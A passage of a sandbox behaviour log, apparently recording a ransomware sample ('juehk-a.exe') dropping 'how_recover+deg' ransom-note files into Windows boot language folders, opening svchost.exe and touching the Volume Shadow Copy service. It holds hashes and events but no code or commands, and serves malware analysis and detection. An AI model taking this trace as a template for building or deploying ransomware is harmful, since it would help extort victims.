6315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6316.          dllname: kernel32.dll
6317.          apiname: Sleep
6318.          address: 0x0041ed5b
6319.        file:
6320.          timestamp: 45811
6321.          mode: created
6322.          sequenceNumber: 485
6323.          value: C:\Boot\de-DE\how_recover+deg.html
6324.          processinfo:
6325.            pid: 1648
6326.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6328.            ads:
6329.          fid (ads:): 562949953520996
6330.          ntstatus: 0x0
6331.          CreateOptions: 0x60
6332.        file:
6333.          timestamp: 45816
6334.          mode: close
6335.          sequenceNumber: 486
6336.          value: C:\Boot\de-DE\how_recover+deg.html
6337.          filesize: 9480
6338.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6339.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6340.          processinfo:
6341.            pid: 1648
6342.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6343.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6344.            ads:
6345.          fid (ads:): 562949953520996
6346.          ntstatus: 0x0
6347.          CreateOptions: 0x0
6348.        file:
6349.          timestamp: 45821
6350.          mode: created
6351.          sequenceNumber: 487
6352.          value: C:\Boot\el-GR\how_recover+deg.txt
6353.          processinfo:
6354.            pid: 1648
6355.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6356.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6357.            ads:
6358.          fid (ads:): 562949953520997
6359.          ntstatus: 0x0
6360.          CreateOptions: 0x60
6361.        file:
6362.          timestamp: 45826
6363.          mode: close
6364.          sequenceNumber: 488
6365.          value: C:\Boot\el-GR\how_recover+deg.txt
6366.          filesize: 2673
6367.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6368.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6369.          processinfo:
6370.            pid: 1648
6371.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6372.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6373.            ads:
6374.          fid (ads:): 562949953520997
6375.          ntstatus: 0x0
6376.          CreateOptions: 0x0
6377.        process:
6378.          timestamp: 45992
6379.          mode: opened
6380.          sequenceNumber: 489
6381.          desiredaccess: 0x02000030
6382.          ntstatus: 0x00000000
6383.          target:
6384.            processinfo:
6385.              pid: 1100
6386.              imagepath: C:\Windows\System32\svchost.exe
6387.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
6388.          source:
6389.            processinfo:
6390.              pid: 1648
6391.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6392.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6393.        file:
6394.          timestamp: 46008
6395.          mode: created
6396.          sequenceNumber: 490
6397.          value: C:\Boot\el-GR\how_recover+deg.html
6398.          processinfo:
6399.            pid: 1648
6400.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6401.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6402.            ads:
6403.          fid (ads:): 562949953520998
6404.          ntstatus: 0x0
6405.          CreateOptions: 0x60
6406.        file:
6407.          timestamp: 46012
6408.          mode: close
6409.          sequenceNumber: 491
6410.          value: C:\Boot\el-GR\how_recover+deg.html
6411.          filesize: 9480
6412.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6413.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6414.          processinfo:
6415.            pid: 1648
6416.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6417.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6418.            ads:
6419.          fid (ads:): 562949953520998
6420.          ntstatus: 0x0
6421.          CreateOptions: 0x0
6422.        file:
6423.          timestamp: 46016
6424.          mode: created
6425.          sequenceNumber: 492
6426.          value: C:\Boot\en-US\how_recover+deg.txt
6427.          processinfo:
6428.            pid: 1648
6429.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6431.            ads:
6432.          fid (ads:): 562949953520999
6433.          ntstatus: 0x0
6434.          CreateOptions: 0x60
6435.        file:
6436.          timestamp: 46020
6437.          mode: close
6438.          sequenceNumber: 493
6439.          value: C:\Boot\en-US\how_recover+deg.txt
6440.          filesize: 2673
6441.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6442.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6443.          processinfo:
6444.            pid: 1648
6445.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6446.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6447.            ads:
6448.          fid (ads:): 562949953520999
6449.          ntstatus: 0x0
6450.          CreateOptions: 0x0
6451.        uac:
6452.          timestamp: 46066
6453.          mode: service
6454.          sequenceNumber: 494
6455.          value: Volume Shadow Copy
6456.          status: running
6457.        process:
6458.          timestamp: 46191
6459.          mode: opened
6460.          sequenceNumber: 495
6461.          desiredaccess: 0x02000030
6462.          ntstatus: 0x00000000
6463.          target:
6464.            processinfo:
6465.              pid: 1100
6466.              imagepath: C:\Windows\System32\svchost.exe
6467.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
6468.          source:
6469.            processinfo:
6470.              pid: 1648
6471.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6472.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6473.        file:
6474.          timestamp: 46204
6475.          mode: created
6476.          sequenceNumber: 496
6477.          value: C:\Boot\en-US\how_recover+deg.html
6478.          processinfo:
6479.            pid: 1648
6480.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6482.            ads:
6483.          fid (ads:): 562949953521000
6484.          ntstatus: 0x0
6485.          CreateOptions: 0x60
6486.        file:
6487.          timestamp: 46209
6488.          mode: close
6489.          sequenceNumber: 497
6490.          value: C:\Boot\en-US\how_recover+deg.html
6491.          filesize: 9480
6492.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6493.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6494.          processinfo:
6495.            pid: 1648
6496.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6497.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6498.            ads:
6499.          fid (ads:): 562949953521000
6500.          ntstatus: 0x0
6501.          CreateOptions: 0x0
6502.        file:
6503.          timestamp: 46213
6504.          mode: created
6505.          sequenceNumber: 498
6506.          value: C:\Boot\es-ES\how_recover+deg.txt
6507.          processinfo:
6508.            pid: 1648
6509.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6510.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6511.            ads:
6512.          fid (ads:): 562949953521001
6513.          ntstatus: 0x0
6514.          CreateOptions: 0x60
6515.        file:
6516.          timestamp: 46217
6517.          mode: close
6518.          sequenceNumber: 499
6519.          value: C:\Boot\es-ES\how_recover+deg.txt
6520.          filesize: 2673
6521.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6522.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6523.          processinfo:
6524.            pid: 1648
6525.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6526.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6527.            ads:
6528.          fid (ads:): 562949953521001
6529.          ntstatus: 0x0
6530.          CreateOptions: 0x0
6531.        process:
6532.          timestamp: 46257
6533.          mode: opened
6534.          sequenceNumber: 500
6535.          desiredaccess: 0x02000030
6536.          ntstatus: 0x00000000
6537.          target:
6538.            processinfo:
6539.              pid: 1100
6540.              imagepath: C:\Windows\System32\svchost.exe
6541.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
6542.          source:
6543.            processinfo:
6544.              pid: 1648
6545.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6546.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6547.        file:
6548.          timestamp: 46334
6549.          mode: created
6550.          sequenceNumber: 501
6551.          value: C:\Boot\es-ES\how_recover+deg.html
6552.          processinfo:
6553.            pid: 1648
6554.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6555.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6556.            ads:
6557.          fid (ads:): 562949953521002
6558.          ntstatus: 0x0
6559.          CreateOptions: 0x60
6560.        file:
6561.          timestamp: 46339
6562.          mode: close
6563.          sequenceNumber: 502
6564.          value: C:\Boot\es-ES\how_recover+deg.html
6565.          filesize: 9480
6566.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6567.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6568.          processinfo:
6569.            pid: 1648
6570.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6571.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6572.            ads:
6573.          fid (ads:): 562949953521002
6574.          ntstatus: 0x0
6575.          CreateOptions: 0x0
6576.        file:
6577.          timestamp: 46380
6578.          mode: created
6579.          sequenceNumber: 503
6580.          value: C:\Boot\fi-FI\how_recover+deg.txt
6581.          processinfo:
6582.            pid: 1648
6583.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6584.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6585.            ads:
6586.          fid (ads:): 562949953521003
6587.          ntstatus: 0x0
6588.          CreateOptions: 0x60
6589.        file:
6590.          timestamp: 46385
6591.          mode: close
6592.          sequenceNumber: 504
6593.          value: C:\Boot\fi-FI\how_recover+deg.txt
6594.          filesize: 2673
6595.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6596.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6597.          processinfo:
6598.            pid: 1648
6599.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6600.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6601.            ads:
6602.          fid (ads:): 562949953521003
6603.          ntstatus: 0x0
6604.          CreateOptions: 0x0
6605.        process:
6606.          timestamp: 46393
6607.          mode: opened
6608.          sequenceNumber: 505
6609.          desiredaccess: 0x02000030
6610.          ntstatus: 0x00000000
6611.          target:
6612.            processinfo:
6613.              pid: 1100
6614.              imagepath: C:\Windows\System32\svchost.exe
6615.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
6616.          source:
6617.            processinfo:
6618.              pid: 1648
6619.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6620.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6621.        file:
6622.          timestamp: 46466
6623.          mode: created
6624.          sequenceNumber: 506
6625.          value: C:\Boot\fi-FI\how_recover+deg.html
6626.          processinfo:
6627.            pid: 1648
6628.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6630.            ads:
6631.          fid (ads:): 562949953521004
6632.          ntstatus: 0x0
6633.          CreateOptions: 0x60
6634.        file:
6635.          timestamp: 46471
6636.          mode: close
6637.          sequenceNumber: 507
6638.          value: C:\Boot\fi-FI\how_recover+deg.html
6639.          filesize: 9480
6640.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6641.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6642.          processinfo:
6643.            pid: 1648
6644.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6646.            ads:
6647.          fid (ads:): 562949953521004
6648.          ntstatus: 0x0
6649.          CreateOptions: 0x0
6650.        file:
6651.          timestamp: 46534
6652.          mode: created
6653.          sequenceNumber: 508
6654.          value: C:\Boot\Fonts\how_recover+deg.txt
6655.          processinfo:
6656.            pid: 1648
6657.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6658.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6659.            ads:
6660.          fid (ads:): 562949953521005
6661.          ntstatus: 0x0
6662.          CreateOptions: 0x60
6663.        file:
6664.          timestamp: 46572
6665.          mode: close
6666.          sequenceNumber: 509
6667.          value: C:\Boot\Fonts\how_recover+deg.txt
6668.          filesize: 2673
6669.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6670.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6671.          processinfo:
6672.            pid: 1648
6673.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6674.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6675.            ads:
6676.          fid (ads:): 562949953521005
6677.          ntstatus: 0x0
6678.          CreateOptions: 0x0
6679.        file:
6680.          timestamp: 46610
6681.          mode: created
6682.          sequenceNumber: 510
6683.          value: C:\Boot\Fonts\how_recover+deg.html
6684.          processinfo:
6685.            pid: 1648
6686.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6688.            ads:
6689.          fid (ads:): 562949953521006
6690.          ntstatus: 0x0
6691.          CreateOptions: 0x60
6692.        file:
6693.          timestamp: 46615
6694.          mode: close
6695.          sequenceNumber: 511
6696.          value: C:\Boot\Fonts\how_recover+deg.html
6697.          filesize: 9480
6698.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6699.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6700.          processinfo:
6701.            pid: 1648
6702.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6703.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6704.            ads:
6705.          fid (ads:): 562949953521006
6706.          ntstatus: 0x0
6707.          CreateOptions: 0x0
6708.        file:
6709.          timestamp: 46677
6710.          mode: created
6711.          sequenceNumber: 512
6712.          value: C:\Boot\fr-FR\how_recover+deg.txt
6713.          processinfo:
6714.            pid: 1648
6715.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6716.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6717.            ads:
6718.          fid (ads:): 562949953521007
6719.          ntstatus: 0x0
6720.          CreateOptions: 0x60
6721.        file:
6722.          timestamp: 46681
6723.          mode: close
6724.          sequenceNumber: 513
6725.          value: C:\Boot\fr-FR\how_recover+deg.txt
6726.          filesize: 2673
6727.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6728.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6729.          processinfo:
6730.            pid: 1648
6731.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6732.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6733.            ads:
6734.          fid (ads:): 562949953521007
6735.          ntstatus: 0x0
6736.          CreateOptions: 0x0
6737.        high_cpu:
6738.          timestamp: 46686
6739.          sequenceNumber: 514
6740.          total_cpu: 49.253406046689626
6741.          processinfo:
6742.            tainted: true
6743.            pid: 2312
6744.            process_cpu: 49.253406046689626
6745.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
6746.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6747.        file:
6748.          timestamp: 46689
6749.          mode: created
6750.          sequenceNumber: 515
6751.          value: C:\Boot\fr-FR\how_recover+deg.html
6752.          processinfo:
6753.            pid: 1648
6754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6756.            ads:
6757.          fid (ads:): 562949953521008
6758.          ntstatus: 0x0
6759.          CreateOptions: 0x60
6760.        file:
6761.          timestamp: 46693
6762.          mode: close
6763.          sequenceNumber: 516
6764.          value: C:\Boot\fr-FR\how_recover+deg.html
6765.          filesize: 9480
6766.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6767.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6768.          processinfo:
6769.            pid: 1648
6770.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6771.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6772.            ads:
6773.          fid (ads:): 562949953521008
6774.          ntstatus: 0x0
6775.          CreateOptions: 0x0
6776.        file:
6777.          timestamp: 46698
6778.          mode: created
6779.          sequenceNumber: 517
6780.          value: C:\Boot\hu-HU\how_recover+deg.txt
6781.          processinfo:
6782.            pid: 1648
6783.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6784.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6785.            ads:
6786.          fid (ads:): 562949953521009
6787.          ntstatus: 0x0
6788.          CreateOptions: 0x60
6789.        file:
6790.          timestamp: 46702
6791.          mode: close
6792.          sequenceNumber: 518
6793.          value: C:\Boot\hu-HU\how_recover+deg.txt
6794.          filesize: 2673
6795.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6796.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6797.          processinfo:
6798.            pid: 1648
6799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6801.            ads:
6802.          fid (ads:): 562949953521009
6803.          ntstatus: 0x0
6804.          CreateOptions: 0x0
6805.        file:
6806.          timestamp: 46883
6807.          mode: created
6808.          sequenceNumber: 519
6809.          value: C:\Boot\hu-HU\how_recover+deg.html
6810.          processinfo:
6811.            pid: 1648
6812.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6814.            ads:
6815.          fid (ads:): 562949953521010
6816.          ntstatus: 0x0
6817.          CreateOptions: 0x60
6818.        file:
6819.          timestamp: 46888
6820.          mode: close
6821.          sequenceNumber: 520
6822.          value: C:\Boot\hu-HU\how_recover+deg.html
6823.          filesize: 9480
6824.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6825.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6826.          processinfo:
6827.            pid: 1648
6828.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6830.            ads:
6831.          fid (ads:): 562949953521010
6832.          ntstatus: 0x0
6833.          CreateOptions: 0x0
6834.        file:
6835.          timestamp: 46894
6836.          mode: created
6837.          sequenceNumber: 521
6838.          value: C:\Boot\it-IT\how_recover+deg.txt
6839.          processinfo:
6840.            pid: 1648
6841.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6842.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6843.            ads:
6844.          fid (ads:): 562949953521011
6845.          ntstatus: 0x0
6846.          CreateOptions: 0x60
6847.        file:
6848.          timestamp: 46898
6849.          mode: close
6850.          sequenceNumber: 522
6851.          value: C:\Boot\it-IT\how_recover+deg.txt
6852.          filesize: 2673
6853.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6854.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6855.          processinfo:
6856.            pid: 1648
6857.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6858.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6859.            ads:
6860.          fid (ads:): 562949953521011
6861.          ntstatus: 0x0
6862.          CreateOptions: 0x0
6863.        file:
6864.          timestamp: 46935
6865.          mode: created
6866.          sequenceNumber: 523
6867.          value: C:\Boot\it-IT\how_recover+deg.html
6868.          processinfo:
6869.            pid: 1648
6870.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6871.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6872.            ads:
6873.          fid (ads:): 562949953521012
6874.          ntstatus: 0x0
6875.          CreateOptions: 0x60
6876.        file:
6877.          timestamp: 46938
6878.          mode: close
6879.          sequenceNumber: 524
6880.          value: C:\Boot\it-IT\how_recover+deg.html
6881.          filesize: 9480
6882.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6883.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6884.          processinfo:
6885.            pid: 1648
6886.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6887.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6888.            ads:
6889.          fid (ads:): 562949953521012
6890.          ntstatus: 0x0
6891.          CreateOptions: 0x0
6892.        apicall:
6893.          timestamp: 46974
6894.          repeat: 70
6895.          sequenceNumber: 525
6896.          processinfo:
6897.            pid: 1648
6898.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6899.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6900.          dllname: kernel32.dll
6901.          apiname: Sleep
6902.          address: 0x0041ed5b
6903.        file:
6904.          timestamp: 47009
6905.          mode: created
6906.          sequenceNumber: 526
6907.          value: C:\Boot\ja-JP\how_recover+deg.txt
6908.          processinfo:
6909.            pid: 1648
6910.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6911.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6912.            ads:
6913.          fid (ads:): 562949953521013
6914.          ntstatus: 0x0
6915.          CreateOptions: 0x60
6916.        file:
6917.          timestamp: 47014
6918.          mode: close
6919.          sequenceNumber: 527
6920.          value: C:\Boot\ja-JP\how_recover+deg.txt
6921.          filesize: 2673
6922.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6923.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6924.          processinfo:
6925.            pid: 1648
6926.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6927.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6928.            ads:
6929.          fid (ads:): 562949953521013
6930.          ntstatus: 0x0
6931.          CreateOptions: 0x0
6932.        file:
6933.          timestamp: 47027
6934.          mode: created
6935.          sequenceNumber: 528
6936.          value: C:\Boot\ja-JP\how_recover+deg.html
6937.          processinfo:
6938.            pid: 1648
6939.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6940.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6941.            ads:
6942.          fid (ads:): 562949953521014
6943.          ntstatus: 0x0
6944.          CreateOptions: 0x60
6945.        file:
6946.          timestamp: 47032
6947.          mode: close
6948.          sequenceNumber: 529
6949.          value: C:\Boot\ja-JP\how_recover+deg.html
6950.          filesize: 9480
6951.          md5sum: a68c3caf0be8f1a393c697136926cfd4
6952.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
6953.          processinfo:
6954.            pid: 1648
6955.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6956.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6957.            ads:
6958.          fid (ads:): 562949953521014
6959.          ntstatus: 0x0
6960.          CreateOptions: 0x0
6961.        file:
6962.          timestamp: 47037
6963.          mode: created
6964.          sequenceNumber: 530
6965.          value: C:\Boot\ko-KR\how_recover+deg.txt
6966.          processinfo:
6967.            pid: 1648
6968.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6969.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6970.            ads:
6971.          fid (ads:): 562949953521015
6972.          ntstatus: 0x0
6973.          CreateOptions: 0x60
6974.        file:
6975.          timestamp: 47040
6976.          mode: close
6977.          sequenceNumber: 531
6978.          value: C:\Boot\ko-KR\how_recover+deg.txt
6979.          filesize: 2673
6980.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
6981.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
6982.          processinfo:
6983.            pid: 1648
6984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6986.            ads:
6987.          fid (ads:): 562949953521015
6988.          ntstatus: 0x0
6989.          CreateOptions: 0x0
6990.        file:
6991.          timestamp: 47096
6992.          mode: created
6993.          sequenceNumber: 532
6994.          value: C:\Boot\ko-KR\how_recover+deg.html
6995.          processinfo:
6996.            pid: 1648
6997.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
6998.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
6999.            ads:
7000.          fid (ads:): 562949953521016
7001.          ntstatus: 0x0
7002.          CreateOptions: 0x60
7003.        file:
7004.          timestamp: 47101
7005.          mode: close
7006.          sequenceNumber: 533
7007.          value: C:\Boot\ko-KR\how_recover+deg.html
7008.          filesize: 9480
7009.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7010.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7011.          processinfo:
7012.            pid: 1648
7013.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7014.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7015.            ads:
7016.          fid (ads:): 562949953521016
7017.          ntstatus: 0x0
7018.          CreateOptions: 0x0
7019.        file:
7020.          timestamp: 47108
7021.          mode: created
7022.          sequenceNumber: 534
7023.          value: C:\Boot\nb-NO\how_recover+deg.txt
7024.          processinfo:
7025.            pid: 1648
7026.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7027.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7028.            ads:
7029.          fid (ads:): 562949953521017
7030.          ntstatus: 0x0
7031.          CreateOptions: 0x60
7032.        file:
7033.          timestamp: 47114
7034.          mode: close
7035.          sequenceNumber: 535
7036.          value: C:\Boot\nb-NO\how_recover+deg.txt
7037.          filesize: 2673
7038.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7039.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7040.          processinfo:
7041.            pid: 1648
7042.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7043.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7044.            ads:
7045.          fid (ads:): 562949953521017
7046.          ntstatus: 0x0
7047.          CreateOptions: 0x0
7048.        file:
7049.          timestamp: 47136
7050.          mode: created
7051.          sequenceNumber: 536
7052.          value: C:\Boot\nb-NO\how_recover+deg.html
7053.          processinfo:
7054.            pid: 1648
7055.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7056.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7057.            ads:
7058.          fid (ads:): 562949953521018
7059.          ntstatus: 0x0
7060.          CreateOptions: 0x60
7061.        file:
7062.          timestamp: 47142
7063.          mode: close
7064.          sequenceNumber: 537
7065.          value: C:\Boot\nb-NO\how_recover+deg.html
7066.          filesize: 9480
7067.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7068.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7069.          processinfo:
7070.            pid: 1648
7071.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7072.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7073.            ads:
7074.          fid (ads:): 562949953521018
7075.          ntstatus: 0x0
7076.          CreateOptions: 0x0
7077.        file:
7078.          timestamp: 47153
7079.          mode: created
7080.          sequenceNumber: 538
7081.          value: C:\Boot\nl-NL\how_recover+deg.txt
7082.          processinfo:
7083.            pid: 1648
7084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7086.            ads:
7087.          fid (ads:): 562949953521019
7088.          ntstatus: 0x0
7089.          CreateOptions: 0x60
7090.        file:
7091.          timestamp: 47159
7092.          mode: close
7093.          sequenceNumber: 539
7094.          value: C:\Boot\nl-NL\how_recover+deg.txt
7095.          filesize: 2673
7096.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7097.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7098.          processinfo:
7099.            pid: 1648
7100.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7101.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7102.            ads:
7103.          fid (ads:): 562949953521019
7104.          ntstatus: 0x0
7105.          CreateOptions: 0x0
7106.        file:
7107.          timestamp: 47177
7108.          mode: created
7109.          sequenceNumber: 540
7110.          value: C:\Boot\nl-NL\how_recover+deg.html
7111.          processinfo:
7112.            pid: 1648
7113.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7114.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7115.            ads:
7116.          fid (ads:): 562949953521020
7117.          ntstatus: 0x0
7118.          CreateOptions: 0x60
7119.        file:
7120.          timestamp: 47182
7121.          mode: close
7122.          sequenceNumber: 541
7123.          value: C:\Boot\nl-NL\how_recover+deg.html
7124.          filesize: 9480
7125.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7126.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7127.          processinfo:
7128.            pid: 1648
7129.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7130.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7131.            ads:
7132.          fid (ads:): 562949953521020
7133.          ntstatus: 0x0
7134.          CreateOptions: 0x0
7135.        file:
7136.          timestamp: 47199
7137.          mode: created
7138.          sequenceNumber: 542
7139.          value: C:\Boot\pl-PL\how_recover+deg.txt
7140.          processinfo:
7141.            pid: 1648
7142.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7143.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
